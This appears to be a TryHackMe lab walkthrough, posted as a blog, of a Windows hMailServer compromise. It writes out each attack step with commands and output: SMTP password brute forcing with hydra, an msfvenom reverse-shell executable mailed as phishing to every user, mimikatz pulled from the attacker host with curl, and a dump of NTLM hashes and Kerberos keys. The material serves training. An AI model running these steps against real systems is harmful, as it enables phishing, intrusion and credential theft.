In this walkthrough, we'll explore how one email password led to a complete mail server compromise.
NMAP command,
sudo nmap -sS -sV -sC -O -Pn -p- --min-rate 1000 -T4 -oA fullscan <target-ip>
The target is a Windows mail server (BRICK-MAIL) running hMailServer with SMTP, POP3, and IMAP services exposed. It also has SMB (445), RDP (3389), and WinRM (5985) open, making those the main services to investigate next.
When I surf the website https://brownbrick.co/, I noticed this part ->
I listed all the emails and for the password try to gather the keywords from the website with the help of the "cewl" & after that with "hydra" checked the open SMTP server at port 587 to find a legit password of someone ->
> ┌──(kali㉿kali)-[~/Try_Hack_Me]
> └─$ cat emails.txt
> oaurelius@brownbrick.co
> wrohit@brownbrick.co
> lhedvig@brownbrick.co
> tchikondi@brownbrick.co
> pcathrine@brownbrick.co
> fstamatis@brownbrick.co
>
> ┌──(kali㉿kali)-[~/Try_Hack_Me]
> └─$ cewl --lowercase https://brownbrick.co/ > passwords.txt
>
> ┌──(kali㉿kali)-[~/Try_Hack_Me]
> └─$ hydra -L emails.txt -P passwords.txt 10.49.179.117 smtp -s 587 -t 12
> Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
> Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-06-13 06:28:48
> [INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
> [DATA] max 12 tasks per 1 server, overall 12 tasks, 1134 login tries (l:6/p:189), ~95 tries per task
> [DATA] attacking smtp://10.49.179.117:587/
> [587][smtp] host: 10.49.179.117 login: lhedvig@brownbrick.co password: br***s
> 1 of 1 target successfully completed, 1 valid password found
> Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-06-13 06:29:27
Now, with this "lhedvig@brownbrick.co" we can send a phishing mail in which we can make the other users to click or execute our attached malicious file [ which we will collect from the "msfvenom" (reverse shell for windows) ] and we notice that "wrohit" user was the victim ->
> ┌──(kali㉿kali)-[~/Try_Hack_Me]
> └─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.129.81 LPORT=443 -f exe -o shell.exe
> [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
> [-] No arch selected, selecting arch: x64 from the payload
> No encoder specified, outputting raw payload
> Payload size: 460 bytes
> Final size of exe file: 7680 bytes
> Saved as: shell.exe
>
> ┌──(kali㉿kali)-[~/Try_Hack_Me]
> └─$ for email in $(cat emails.txt); do sendemail -f "lhedvig@brownbrick.co" -t "$email" -u "test" -m "test" -a shell.exe -s 10.49.179.117:25 -xu "lhedvig@brownbrick.co" -xp "bricks"; done
> Jun 13 07:40:38 kali sendemail[5277]: Email was sent successfully!
> Jun 13 07:40:39 kali sendemail[5278]: Email was sent successfully!
> Jun 13 07:40:39 kali sendemail[5279]: Email was sent successfully!
> Jun 13 07:40:40 kali sendemail[5280]: Email was sent successfully!
> Jun 13 07:40:40 kali sendemail[5281]: Email was sent successfully!
> Jun 13 07:40:41 kali sendemail[5282]: Email was sent successfully!
And in the reverse shell listener port we get this ->
> ┌──(kali㉿kali)-[~/Try_Hack_Me]
> └─$ rlwrap nc -lvnp 443
> listening on [any] 443 ...
> connect to [192.168.129.81] from (UNKNOWN) [10.49.179.117] 49946
> Microsoft Windows [Version 10.0.17763.1821]
> (c) 2018 Microsoft Corporation. All rights reserved.
> C:\Mail\Attachments>whoami
> whoami
> brick-mail\wrohit
> C:\Mail\Attachments>dir
> dir
> Volume in drive C has no label.
> Volume Serial Number is A8A4-C362
> Directory of C:\Mail\Attachments
> 06/13/2026 11:40 AM <DIR> .
> 06/13/2026 11:40 AM <DIR> ..
> 03/17/2024 06:09 PM 258 exec-mail.ps1
> 06/13/2026 11:40 AM 7,680 shell.exe
> 2 File(s) 7,938 bytes
> 2 Dir(s) 13,990,260,736 bytes free
> C:\Mail\Attachments>dir C:\*flag*.txt /s
> dir C:\*flag*.txt /s
> Volume in drive C has no label.
> Volume Serial Number is A8A4-C362
> Directory of C:\Users\wrohit\Desktop
> 03/11/2024 05:15 AM 25 flag.txt
> 1 File(s) 25 bytes
> Total Files Listed:
> 1 File(s) 25 bytes
> 0 Dir(s) 13,990,260,736 bytes free
> C:\Mail\Attachments>type C:\Users\wrohit\Desktop\flag.txt
> type C:\Users\wrohit\Desktop\flag.txt
> THM{l1v1n_7h3_*****_****}
and we get the flag.
At this point, since we are a member of the Administrators group, we can simply upload Mimikatz to the machine and use it to dump the hashes from the SAM registry as follows:
host a python server ->
┌──(kali㉿kali)-[~/Try_Hack_Me]
└─$ wget https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe
--2026-06-13 08:00:57-- https://github.com/ParrotSec/mimikatz/blob/master/x64/mimikatz.exe
Resolving github.com (github.com)... 20.205.243.166
Connecting to github.com (github.com)|20.205.243.166|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘mimikatz.exe’
mimikatz.exe [ <=> ] 220.01K 757KB/s in 0.3s
2026-06-13 08:00:59 (757 KB/s) - ‘mimikatz.exe’ saved [225288]
┌──(kali㉿kali)-[~/Try_Hack_Me]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.49.179.117 - - [13/Jun/2026 08:02:12] "GET /mimikatz.exe HTTP/1.1" 200 -
and download that from the reverse shell ->
C:\Mail\Attachments>curl http://192.168.129.81:8000/mimikatz.exe -o mimikatz.exe
then, we searched for the method of dumping Sam database via mimikatz ->
C:\Mail\Attachments>mimikatz.exe
mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
728 {0;000003e7} 1 D 25319 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;003146ba} 0 D 3995258 BRICK-MAIL\wrohitS-1-5-21-1966530601-3185510712-10604624-1014 (14g,24p) Primary
* Thread Token : {0;000003e7} 1 D 4017344 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz # lsadump::sam
Domain : BRICK-MAIL
SysKey : 36c8d26ec0df8b23ce63bcefa6e2d821
Local SID : S-1-5-21-1966530601-3185510712-10604624
SAMKey : 6e708461100b4988991ce3b4d8b1784e
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 2dfe3378335d43f9764e581b856a662a
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 3d527dff081980ff09e87e492cebee23
* Primary:Kerberos-Newer-Keys *
Default Salt : EC2AMAZ-QTVAAHMAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 9484aadacd6c5994aed633bf92b6b3db31c57c932d2cd84a7fa635a0b3262806
aes128_hmac (4096) : cdda685dd630dd0796e5ddf38e22dce5
des_cbc_md5 (4096) : 08340db613fb46b5
OldCredentials
aes256_hmac (4096) : 50141e3b3b449512e393a66c32e7f89a131744eef5d8a3f6a8576919a810cda3
aes128_hmac (4096) : 0d717b42dbaf77bb7248b4bebf8bb3a6
des_cbc_md5 (4096) : bc23a20170542f25
OlderCredentials
aes256_hmac (4096) : 3b191b95e0b1fa83077319699194a79c8adea64e36bade3e959ccbbff42ea095
aes128_hmac (4096) : 318ecf3e0f6b969a949092706b519548
des_cbc_md5 (4096) : 97f7bc3ead1f6ed6
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : EC2AMAZ-QTVAAHMAdministrator
Credentials
des_cbc_md5 : 08340db613fb46b5
OldCredentials
des_cbc_md5 : bc23a20170542f25
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : a1528cd40d99e5dfa9fa0809af998696
* Primary:Kerberos-Newer-Keys *
Default Salt : WDAGUtilityAccount
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 3ff137e53cac32e3e3857dc89b725fd62ae4eee729c1c5c077e54e5882d8bd55
aes128_hmac (4096) : 15ac5054635c97d02c174ee3aa672227
des_cbc_md5 (4096) : ce9b2cabd55df4ce
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : WDAGUtilityAccount
Credentials
des_cbc_md5 : ce9b2cabd55df4ce
RID : 000003f1 (1009)
User : fstamatis
Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 2ac6116566738883775d4c64894922ea
* Primary:Kerberos-Newer-Keys *
Default Salt : BRICK-MAILfstamatis
Default Iterations : 4096
Credentials
aes256_hmac (4096) : b677f117b8f87d99bd2bec0dc2763404eb28d34e173722ec4d663d439b121c6d
aes128_hmac (4096) : d96cbd8c143e83959cf98b1b37bc5c08
des_cbc_md5 (4096) : 017acb2f802a70a2
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : BRICK-MAILfstamatis
Credentials
des_cbc_md5 : 017acb2f802a70a2
RID : 000003f2 (1010)
User : lhedvig
Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 9a9fe1153250a8c494ac7290b6e86bec
* Primary:Kerberos-Newer-Keys *
Default Salt : BRICK-MAILlhedvig
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 9cc3c27c2b6a7a6bfdcf4c9790aee0bd3012f337a8c452a0a5321ee6673c663b
aes128_hmac (4096) : 9d9bc45f622cf03fe08b86bd9ef45e5a
des_cbc_md5 (4096) : d96770bce3ba327a
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : BRICK-MAILlhedvig
Credentials
des_cbc_md5 : d96770bce3ba327a
RID : 000003f3 (1011)
User : oaurelius
Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : bb03e2de24b406b050d5c4b110de5d94
* Primary:Kerberos-Newer-Keys *
Default Salt : BRICK-MAILoaurelius
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 4e4d369c51fe79b5fa9cd372a6e2983b3d30ae43f7990701548775d087106532
aes128_hmac (4096) : ed9ae473c2213b7994c94e800cdb05ca
des_cbc_md5 (4096) : 3167266bd54c3191
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : BRICK-MAILoaurelius
Credentials
des_cbc_md5 : 3167266bd54c3191
RID : 000003f4 (1012)
User : pcathrine
Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : e52951c39856ffc37c81c2df09ccad3c
* Primary:Kerberos-Newer-Keys *
Default Salt : BRICK-MAILpcathrine
Default Iterations : 4096
Credentials
aes256_hmac (4096) : ea10cad59f29a9c8daf61992e574781a095d9e4c6443da8170a7c07c051eda59
aes128_hmac (4096) : 93005a1203c24a41c9a05beee9662d13
des_cbc_md5 (4096) : ae701fec345b3b8c
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : BRICK-MAILpcathrine
Credentials
des_cbc_md5 : ae701fec345b3b8c
RID : 000003f5 (1013)
User : tchikondi
Hash NTLM: 034c830cc313485a82e57a0d9dfa14e4
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 5588ad299d776483b44417c0bd88861a
* Primary:Kerberos-Newer-Keys *
Default Salt : BRICK-MAILtchikondi
Default Iterations : 4096
Credentials
aes256_hmac (4096) : eaa49b1593bb2c8240611ead9100002a3c520fcbfd103629da20046e5f093b10
aes128_hmac (4096) : ef093a7d07ae03cedfbe3098a7376706
des_cbc_md5 (4096) : 6bab43253e6b4aa1
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : BRICK-MAILtchikondi
Credentials
des_cbc_md5 : 6bab43253e6b4aa1
RID : 000003f6 (1014)
User : wrohit
Hash NTLM: 8458995f1d0a4b0c107fb8**********
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 5e0d9f81c0780c189099b7758d79a2e6
* Primary:Kerberos-Newer-Keys *
Default Salt : BRICK-MAILwrohit
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 06cf703200c4fcd6ffaca428e96f18e5063dbb956c58aa7edee5b5acd7817b64
aes128_hmac (4096) : 8976fef34b9b36fea80c2d65c764ec5e
des_cbc_md5 (4096) : 192558b67f7983a4
OldCredentials
aes256_hmac (4096) : 227b60e30b0f1b929da7a0022c56de98121b6b8c151061be8f3923b823b6a85a
aes128_hmac (4096) : 82b5027730dd8a73890e09ea65cec047
des_cbc_md5 (4096) : 13adae677067f7e9
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : BRICK-MAILwrohit
Credentials
des_cbc_md5 : 192558b67f7983a4
OldCredentials
des_cbc_md5 : 13adae677067f7e9
And we get the NTLM hash of "wrohit" ->
User : wrohit Hash NTLM: 8458995f1d0a4b0c107fb8**********
Lastly, we are tasked with finding the password for the hMailServer Administrator Dashboard
C:\Mail\Attachments>dir C:\*hMailServer* /s
dir C:\*hMailServer* /s
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Program Files (x86)
01/29/2024 05:45 AM <DIR> hMailServer
0 File(s) 0 bytes
Directory of C:\Program Files (x86)\hMailServer\Addons\DataDirectorySynchronizer
10/03/2021 08:12 AM 176,128 Interop.hMailServer.dll
1 File(s) 176,128 bytes
Directory of C:\Program Files (x86)\hMailServer\Bin
10/03/2021 08:12 AM 4,636,672 hMailServer.exe
02/25/2024 11:15 PM 604 hMailServer.INI
10/03/2021 08:12 AM 19,456 hMailServer.Minidump.exe
10/03/2021 08:09 AM 163,976 hMailServer.tlb
10/03/2021 08:12 AM 176,128 Interop.hMailServer.dll
5 File(s) 4,996,836 bytes
Directory of C:\Program Files (x86)\hMailServer\Database
06/17/2026 06:45 AM 675,840 hMailServer.sdf
1 File(s) 675,840 bytes
Directory of C:\ProgramData\Microsoft\Windows\Start Menu\Programs
01/29/2024 05:45 AM <DIR> hMailServer
0 File(s) 0 bytes
Directory of C:\ProgramData\Microsoft\Windows\Start Menu\Programs\hMailServer
01/29/2024 05:45 AM 1,175 hMailServer Administrator.lnk
01/29/2024 05:45 AM 1,158 hMailServer Database Setup.lnk
2 File(s) 2,333 bytes
Directory of C:\ProgramData\Microsoft\Windows\Start Menu\Programs\hMailServer\Installation
01/29/2024 05:45 AM 1,077 Uninstall hMailServer.lnk
1 File(s) 1,077 bytes
Directory of C:\Users\Administrator\AppData\Local\Halvar Information
01/29/2024 05:42 AM <DIR> hMailServer
0 File(s) 0 bytes
Directory of C:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100
03/28/2024 04:04 AM 37,014 {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_hMailServer_Addons_DataDirectorySynchronizer_DataDirectorySynchronizer_exe
03/28/2024 04:04 AM 37,014 {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_hMailServer_Bin_DBSetup_exe
03/28/2024 04:04 AM 37,014 {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_hMailServer_Bin_hMailAdmin_exe
03/28/2024 04:04 AM 37,014 {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}_hMailServer_unins000_exe
4 File(s) 148,056 bytes
Directory of C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent
02/25/2024 11:15 PM 1,009 hMailServer.lnk
1 File(s) 1,009 bytes
Directory of C:\Users\All Users\Microsoft\Windows\Start Menu\Programs
01/29/2024 05:45 AM <DIR> hMailServer
0 File(s) 0 bytes
Directory of C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\hMailServer
01/29/2024 05:45 AM 1,175 hMailServer Administrator.lnk
01/29/2024 05:45 AM 1,158 hMailServer Database Setup.lnk
2 File(s) 2,333 bytes
Directory of C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\hMailServer\Installation
01/29/2024 05:45 AM 1,077 Uninstall hMailServer.lnk
1 File(s) 1,077 bytes
I gave this terminal directory output and ask the AI about the best chance to get that type of info from and the AI said ->
And we got the Administrator's Password ->
Decode that hash in crackstation you will get the password :)
Top comments (0)